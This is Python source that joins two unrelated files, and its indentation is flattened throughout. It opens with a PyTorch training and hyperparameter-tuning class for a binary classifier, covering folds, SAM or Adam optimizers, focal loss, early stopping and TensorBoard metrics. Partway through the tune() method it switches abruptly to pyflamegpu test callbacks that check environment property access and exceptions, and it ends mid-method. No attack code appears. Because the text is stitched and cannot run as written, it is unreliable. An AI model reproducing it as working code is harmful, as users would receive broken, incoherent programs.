self.fix_nlayers = self.cli_args.fix_nlayers
self.t_learnRate = self.cli_args.learnRate
self.t_decay = self.cli_args.decay
if "focal" in self.cli_args.loss.lower():
self.t_alpha = self.cli_args.focal_alpha
self.t_gamma = self.cli_args.focal_gamma
# Make results directory
self.output_dir = os.path.join("results", f"{self.cli_args.exp_name}-{self.cli_args.mode}")
def reset_torch_seeds(self):
seed_value = self.cli_args.seed
torch.manual_seed(seed_value)
if self.use_cuda:
torch.cuda.manual_seed(seed_value)
torch.cuda.manual_seed_all(seed_value)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def reset_rndm(self):
seed_value = self.cli_args.seed
np.random.seed(seed_value)
random.seed(seed_value)
def init_model(self, sample=None):
raise NotImplementedError
def init_data(self, fold, mean=None, std=None):
raise NotImplementedError
def init_tune(self, train):
raise NotImplementedError
def init_optimizer(self):
if self.cli_args.sam:
optim = SAM(self.model.parameters(), Adam, lr=self.t_learnRate)
else:
optim = Adam(self.model.parameters(), lr=self.t_learnRate)
decay = self.t_decay
scheduler = None
if decay < 1.0:
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optim, gamma=decay, verbose=True)
return optim, scheduler
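# Note: the SAM optimizer needs a closure that re-evaluates the loss so it can
# take its second (perturbed) gradient step; do_training below therefore passes
# `closure` to optimizer.step() when --sam is enabled.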
def init_loaders(self, train_ds, val_ds):
batch_size = self.cli_args.batch_size
if self.use_cuda:
batch_size *= torch.cuda.device_count()
train_dl = DataLoader(
train_ds,
batch_size=batch_size,
num_workers=self.cli_args.num_workers,
pin_memory=self.use_cuda,
)
val_dl = DataLoader(
val_ds,
batch_size=batch_size,
num_workers=self.cli_args.num_workers,
pin_memory=self.use_cuda,
)
return train_dl, val_dl
def init_tensorboard_writers(self, fold):
if self.trn_writer is None:
log_dir = os.path.join(self.output_dir, "logs")
self.trn_writer = SummaryWriter(
log_dir=f"{log_dir}-{fold}-trn_cls"
)
self.val_writer = SummaryWriter(
log_dir=f"{log_dir}-{fold}-val_cls"
)
def main(self):
# Make the output folder
assert not os.path.exists(self.output_dir), "Choose a unique experiment name or clean up after yourself :-)"
os.makedirs(self.output_dir)
log.info("Starting {}, {}".format(type(self).__name__, self.cli_args))
assert self.cli_args.mode in ["train", "tune"], "Only train or tune are allowed modes"
log.info(f"********** MODE = {self.cli_args.mode} *****************")
if self.cli_args.mode == "train":
self.main_training()
else:
self.tune()
def main_training(self):
# Load chunks file
_df = pd.read_csv(self.cli_args.datapoints, sep="\t")
if "fold_0" in _df.columns.values:
tot_folds = find_folds(_df)
log.info(f'Found a total of {tot_folds} folds to process')
else:
tot_folds = 1
for fold in range(tot_folds):
# Print
log.info(f'FOLD {fold}')
log.info('--------------------------------')
# Data
mean, std = norms[self.cli_args.norm]
train_ds, val_ds, train_dl, val_dl = self.init_data(fold, mean=mean, std=std)
# Get a sample batch
sample = []
for n, point in enumerate(train_dl):
if n == 1:
break
x = point[0]
sample.append(x)
sample = torch.cat(sample, dim=0)
# Generate weights
log.info('Calculating class weights')
self.weights = get_class_weights(train_ds)
self.weights = self.weights.to(self.device)
# Model
log.info('Initializing model')
self.model = self.init_model(sample=sample)
log.info('Model initialized')
self.totalTrainingSamples_count = 0
# Optimizer
self.optimizer, self.scheduler = self.init_optimizer()
log.info('Optimizer initialized')
# Early stopping class tracks the best validation loss
es = EarlyStopping(patience=self.patience)
# If model is using cnn_finetune, we need to update the transform with the new
# mean and std deviation values
try:
dpm = self.model if not self.use_cuda else self.model.module
except nn.modules.module.ModuleAttributeError:
dpm = self.model
if hasattr(dpm, "original_model_info"):
log.info('*******************USING PRETRAINED MODEL*********************')
mean = dpm.original_model_info.mean
std = dpm.original_model_info.std
train_ds, val_ds, train_dl, val_dl = self.init_data(fold, mean=mean, std=std)
log.info('*******************NORMALISATION DETAILS*********************')
log.info(f"preprocessing mean: {mean}, std: {std}")
# Training loop
for epoch_ndx in range(1, self.cli_args.epochs + 1):
log.info("FOLD {}, Epoch {} of {}, {}/{} batches of size {}*{}".format(
fold,
epoch_ndx,
self.cli_args.epochs,
len(train_dl),
len(val_dl),
self.cli_args.batch_size,
(torch.cuda.device_count() if self.use_cuda else 1),
))
trn_metrics_t = self.do_training(fold, epoch_ndx, train_dl)
self.log_metrics(fold, epoch_ndx, 'trn', trn_metrics_t)
val_metrics_t = self.do_validation(fold, epoch_ndx, val_dl)
self.log_metrics(fold, epoch_ndx, 'val', val_metrics_t)
# Checkpoint if it's the best model
val_loss = val_metrics_t[METRICS_LOSS_NDX].mean()
es(val_loss)
if val_loss < es.best_loss:
checkpoint = {
"EPOCH": epoch_ndx,
"model_state_dict": self.model.state_dict(),
"optimizer_state_dict": self.optimizer.state_dict(),
"LOSS": val_loss
}
ch_path = os.path.join(self.output_dir,
f"model-{self.cli_args.exp_name}-fold{fold}-epoch{epoch_ndx}.pth")
torch.save(checkpoint, ch_path)
obj, _, _ = roc_and_auc(val_metrics_t[METRICS_PRED_NDX].numpy(),
val_metrics_t[METRICS_LABEL_NDX].numpy())
log.info(f"Status AUC: {obj:.3f}")
if self.cli_args.earlystopping:
if es.early_stop:
break
model_path = os.path.join(self.output_dir,
f"model-{self.cli_args.exp_name}-fold{fold}.pth")
torch.save(self.model.state_dict(), model_path)
if hasattr(self, 'trn_writer'):
self.trn_writer.close()
self.val_writer.close()
self.trn_writer = None
self.val_writer = None
# Save CLI args
cli_name = os.path.join(self.output_dir, 'options.json')
with open(cli_name, 'w') as f:
json.dump(self.cli_args.__dict__, f, indent=2)
def do_training(self, fold, epoch_ndx, train_dl):
self.model = self.model.train().to(self.device)
trn_metrics_g = torch.zeros(
METRICS_SIZE,
len(train_dl.dataset),
device=self.device
)
batch_iter = enumerate_with_estimate(
train_dl,
"F{}, E{} Training".format(fold, epoch_ndx),
start_ndx=train_dl.num_workers,
)
for batch_ndx, batch_tup in batch_iter:
def closure():
self.optimizer.zero_grad()
loss_var = self.compute_batch_loss(
batch_ndx,
batch_tup,
train_dl.batch_size,
trn_metrics_g
)
loss_var.backward()
return loss_var
closure()
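# SAM (sharpness-aware minimization) optimizers take the closure so they can
# re-run the forward/backward pass at the perturbed weights; a plain optimizer
# only needs the gradients already computed by the closure() call above.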
if self.cli_args.sam:
self.optimizer.step(closure)
else:
self.optimizer.step()
if self.scheduler:
self.scheduler.step()
self.totalTrainingSamples_count += len(train_dl.dataset)
return trn_metrics_g.to('cpu')
def do_validation(self, fold, epoch_ndx, val_dl):
with torch.no_grad():
self.model = self.model.eval()
val_metrics_g = torch.zeros(
METRICS_SIZE,
len(val_dl.dataset),
device=self.device,
)
batch_iter = enumerate_with_estimate(
val_dl,
"F{} E{} Validation ".format(fold, epoch_ndx),
start_ndx=val_dl.num_workers,
)
for batch_ndx, batch_tup in batch_iter:
self.compute_batch_loss(
batch_ndx, batch_tup, val_dl.batch_size, val_metrics_g, debug=False)
return val_metrics_g.to('cpu')
def compute_batch_loss(self, batch_ndx, batch_tup, batch_size, metrics_g, debug=False):
input_t, label_t, _ = batch_tup
input_g = input_t.to(self.device, non_blocking=True)
label_g = label_t.to(self.device, non_blocking=True)
input_g = input_g.float()
if self.cli_args.dim == 2:
logits_g = self.model(input_g)
probability_g = nn.Softmax(dim=1)(logits_g)
else:
logits_g, probability_g = self.model(input_g)
CE = nn.CrossEntropyLoss(reduction='none', weight=self.weights)
if "focal" in self.cli_args.loss.lower():
loss_g = focal_loss(CE(logits_g, label_g), label_g, self.t_gamma, self.t_alpha)
else:
loss_g = CE(logits_g, label_g)
start_ndx = batch_ndx * batch_size
end_ndx = start_ndx + label_t.size(0)
metrics_g[METRICS_LABEL_NDX, start_ndx:end_ndx] = label_g.detach()
metrics_g[METRICS_PRED_NDX, start_ndx:end_ndx] = probability_g[:, 1].detach()
metrics_g[METRICS_LOSS_NDX, start_ndx:end_ndx] = loss_g.detach()
if debug:
print(logits_g)
print(label_g)
print(probability_g[:, 1])
print(loss_g)
print("***")
return loss_g.mean()
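# A minimal sketch of the focal_loss weighting used in compute_batch_loss above
# (an assumption, not the project's implementation): per-sample cross-entropy
# is rescaled by alpha * (1 - p_t) ** gamma, where p_t is the probability the
# model assigned to the true class, recovered here from the CE value itself.
# The real helper may instead use `labels` to select a per-class alpha.
def focal_loss_sketch(ce_per_sample, labels, gamma, alpha):
    p_t = torch.exp(-ce_per_sample)  # CE = -log(p_t)  =>  p_t = exp(-CE)
    return alpha * (1.0 - p_t) ** gamma * ce_per_sample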
def log_metrics(
self,
fold,
epoch_ndx,
mode_str,
metrics_t,
classification_threshold=0.5,
):
self.init_tensorboard_writers(fold)
log.info("F{} E{} {}".format(
fold,
epoch_ndx,
type(self).__name__,
))
metrics_dict = process_metrics(metrics_t, classification_threshold)
log.info(
("F{} E{} {:8} {loss/all:.4f} loss, "
+ "{correct/all:-5.1f}% correct, "
).format(
fold,
epoch_ndx,
mode_str,
**metrics_dict,
)
)
log.info(
("F{} E{} {:8} {loss/neg:.4f} loss, "
+ "{correct/neg:-5.1f}% correct ({neg_correct:} of {neg_count:})"
).format(
fold,
epoch_ndx,
mode_str + '_neg',
**metrics_dict,
)
)
log.info(
("F{} E{} {:8} {loss/pos:.4f} loss, "
+ "{correct/pos:-5.1f}% correct ({pos_correct:} of {pos_count:})"
).format(
fold,
epoch_ndx,
mode_str + '_pos',
**metrics_dict,
)
)
writer = getattr(self, mode_str + '_writer')
for key, value in metrics_dict.items():
if type(value) is float or type(value) is int:
writer.add_scalar(key, value, self.totalTrainingSamples_count)
writer.add_pr_curve(
'pr',
metrics_t[METRICS_LABEL_NDX],
metrics_t[METRICS_PRED_NDX],
self.totalTrainingSamples_count,
)
bins = [x / 50.0 for x in range(51)]
neg_hist_mask = metrics_dict['neg_label_mask'] & (metrics_t[METRICS_PRED_NDX] > 0.01)
pos_hist_mask = metrics_dict['pos_label_mask'] & (metrics_t[METRICS_PRED_NDX] < 0.99)
if neg_hist_mask.any():
writer.add_histogram(
'is_neg',
metrics_t[METRICS_PRED_NDX, neg_hist_mask],
self.totalTrainingSamples_count,
bins=bins,
)
if pos_hist_mask.any():
writer.add_histogram(
'is_pos',
metrics_t[METRICS_PRED_NDX, pos_hist_mask],
self.totalTrainingSamples_count,
bins=bins,
)
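# A minimal sketch of the process_metrics helper consumed by log_metrics above,
# reconstructed from the keys it uses (an assumption, not the project's code):
# per-class loss and accuracy plus the label masks used for the histograms.
def process_metrics_sketch(metrics_t, classification_threshold=0.5):
    neg_label_mask = metrics_t[METRICS_LABEL_NDX] <= classification_threshold
    pos_label_mask = ~neg_label_mask
    neg_pred_mask = metrics_t[METRICS_PRED_NDX] <= classification_threshold
    pos_pred_mask = ~neg_pred_mask
    neg_count = int(neg_label_mask.sum())
    pos_count = int(pos_label_mask.sum())
    neg_correct = int((neg_label_mask & neg_pred_mask).sum())
    pos_correct = int((pos_label_mask & pos_pred_mask).sum())
    return {
        'loss/all': metrics_t[METRICS_LOSS_NDX].mean().item(),
        'loss/neg': metrics_t[METRICS_LOSS_NDX, neg_label_mask].mean().item(),
        'loss/pos': metrics_t[METRICS_LOSS_NDX, pos_label_mask].mean().item(),
        'correct/all': (neg_correct + pos_correct) / metrics_t.shape[1] * 100,
        'correct/neg': neg_correct / max(neg_count, 1) * 100,
        'correct/pos': pos_correct / max(pos_count, 1) * 100,
        'neg_correct': neg_correct, 'neg_count': neg_count,
        'pos_correct': pos_correct, 'pos_count': pos_count,
        'neg_label_mask': neg_label_mask, 'pos_label_mask': pos_label_mask,
    }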
def tune_train(self, trial):
# Save the study status
joblib.dump(self.study, os.path.join(self.output_dir, 'tuning_study.pkl'))
# Initialize tuneable params
self.init_tune(trial)
# Model initialisation
#if self.fix_nlayers:
self.model = self.init_model(sample=self.sample)
# Save the initial state to reproduce the tuning value
model_path = os.path.join(self.output_dir,
f"model_init_{trial.number}.pth")
torch.save(self.model.state_dict(), model_path)
self.init_dict[trial.number] = model_path
# If the model comes from cnn_finetune, update the data transforms with the
# pretrained model's own mean and standard deviation values
try:
dpm = self.model if not self.use_cuda else self.model.module
except nn.modules.module.ModuleAttributeError:
dpm = self.model
if hasattr(dpm, "original_model_info"):
log.info('*******************USING PRETRAINED MODEL*********************')
mean = dpm.original_model_info.mean
std = dpm.original_model_info.std
train_ds, val_ds, self.train_dl, self.val_dl = self.init_data(0, mean=mean, std=std)
# Optimizer
self.optimizer, self.scheduler = self.init_optimizer()
log.info('Optimizer initialized')
# Early stopping class tracks the best validation loss
es = EarlyStopping(patience=self.patience)
# Training loop
val_metrics_t = None
for epoch_ndx in range(1, self.cli_args.epochs + 1):
trn_metrics_t = self.do_training(0, epoch_ndx, self.train_dl)
self.log_metrics(0, epoch_ndx, 'trn', trn_metrics_t)
val_metrics_t = self.do_validation(0, epoch_ndx, self.val_dl)
self.log_metrics(0, epoch_ndx, 'val', val_metrics_t)
val_loss = val_metrics_t[METRICS_LOSS_NDX].mean()
es(val_loss)
if self.cli_args.earlystopping:
if es.early_stop:
break
try:
obj, _, _ = roc_and_auc(val_metrics_t[METRICS_PRED_NDX].numpy(),
val_metrics_t[METRICS_LABEL_NDX].numpy())
except ValueError:
return None
log.info(f"Calculated objective: {obj:.3f}")
return -obj
def tune(self):
log.info('Initializing model and data')
# Data
mean, std = norms[self.cli_args.norm]
train_ds, val_ds, self.train_dl, self.val_dl = self.init_data(0, mean=mean, std=std)
# Get a sample batch
sample = []
for n, point in enumerate(self.train_dl):
if n == 1:
break
x = point[0]
sample.append(x)
self.sample = torch.cat(sample, dim=0)
# Generate weights
self.weights = get_class_weights(train_ds)
self.weights = self.weights.to(self.device)
init1 = MiniSim.make_array()
assert self.set_uint8_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint8_a == TEST_VALUE * 2
class get_set_array_element_int16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_int16_a = FLAMEGPU.environment.setPropertyInt16("int16_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_int16_a = FLAMEGPU.environment.getPropertyInt16("int16_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyInt16("int16_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_int16_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_int16_a == TEST_VALUE * 2
class get_set_array_element_uint16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_uint16_a = FLAMEGPU.environment.setPropertyUInt16("uint16_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_uint16_a = FLAMEGPU.environment.getPropertyUInt16("uint16_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyUInt16("uint16_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_uint16_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint16_a == TEST_VALUE * 2
class get_set_array_element_int32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_int32_a = FLAMEGPU.environment.setPropertyInt32("int32_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_int32_a = FLAMEGPU.environment.getPropertyInt32("int32_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyInt32("int32_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_int32_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_int32_a == TEST_VALUE * 2
class get_set_array_element_uint32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_uint32_a = FLAMEGPU.environment.setPropertyUInt32("uint32_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_uint32_a = FLAMEGPU.environment.getPropertyUInt32("uint32_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyUInt32("uint32_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_uint32_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint32_a == TEST_VALUE * 2
class get_set_array_element_int64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_int64_a = FLAMEGPU.environment.setPropertyInt64("int64_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_int64_a = FLAMEGPU.environment.getPropertyInt64("int64_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyInt64("int64_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_int64_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_int64_a == TEST_VALUE * 2
class get_set_array_element_uint64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
self.set_uint64_a = FLAMEGPU.environment.setPropertyUInt64("uint64_a_", TEST_ARRAY_LEN - 1, TEST_VALUE * 2)
self.get_uint64_a = FLAMEGPU.environment.getPropertyUInt64("uint64_a_", TEST_ARRAY_LEN - 1)
FLAMEGPU.environment.setPropertyUInt64("uint64_a_", TEST_ARRAY_LEN - 1, init1[TEST_ARRAY_LEN - 1])
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.set_uint64_a == init1[TEST_ARRAY_LEN - 1]
assert self.get_uint64_a == TEST_VALUE * 2
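# Each get_set_array_element_* callback above follows the same round-trip:
# setProperty<T>() returns the element's previous value, getProperty<T>() then
# reads back the newly written TEST_VALUE * 2, and the original value is
# restored so later steps see an unmodified environment. Illustrative pseudo
# form of the pattern (not pyflamegpu API):
#
#     old = env[name][idx]             # value returned by the set call
#     env[name][idx] = TEST_VALUE * 2
#     assert old == make_array()[idx]
#     assert env[name][idx] == TEST_VALUE * 2
#     env[name][idx] = old             # restore for subsequent callbacks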
# Exception PropertyType
class exception_property_type_float(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("float_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("float_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_double(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("double_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("double_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("int8_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("int8_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("uint8_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("uint8_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("int16_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("int16_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("uint16_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("uint16_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("int32_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("int32_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyUInt64("uint32_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt64("uint32_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_int64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyFloat("int64_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayFloat("int64_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
class exception_property_type_uint64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
init1 = MiniSim.make_array()
try:
FLAMEGPU.environment.setPropertyFloat("uint64_", TEST_VALUE)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayFloat("uint64_", init1)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
init1 = MiniSim.make_array()
assert self.e1 == "InvalidEnvPropertyType"
assert self.e2 == "InvalidEnvPropertyType"
# Exceptions Length
class exception_property_length_float(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayFloat("float_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayFloat("float_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayFloat("float_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_double(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayDouble("double_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayDouble("double_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayDouble("double_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt8("int8_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt8("int8_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt8("int8_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint8(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayUInt8("uint8_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayUInt8("uint8_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt8("uint8_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt16("int16_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt16("int16_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt16("int16_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint16(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayUInt16("uint16_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayUInt16("uint16_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt16("uint16_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt32("int32_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt32("int32_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt32("int32_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_uint32(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayUInt32("uint32_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayUInt32("uint32_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayUInt32("uint32_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
assert self.e1 == "OutOfBoundsException"
assert self.e2 == "OutOfBoundsException"
class exception_property_length_int64(pyflamegpu.HostFunctionCallback):
def __init__(self):
super().__init__()
def run(self, FLAMEGPU):
b = MiniSim.make_array()
b1 = [0] * 2
b2 = [0] * 8
FLAMEGPU.environment.setPropertyArrayInt64("int64_a_", b)
try:
FLAMEGPU.environment.setPropertyArrayInt64("int64_a_", b1)
except pyflamegpu.FGPURuntimeException as e:
self.e1 = e.type()
try:
FLAMEGPU.environment.setPropertyArrayInt64("int64_a_", b2)
except pyflamegpu.FGPURuntimeException as e:
self.e2 = e.type()
def apply_assertions(self):
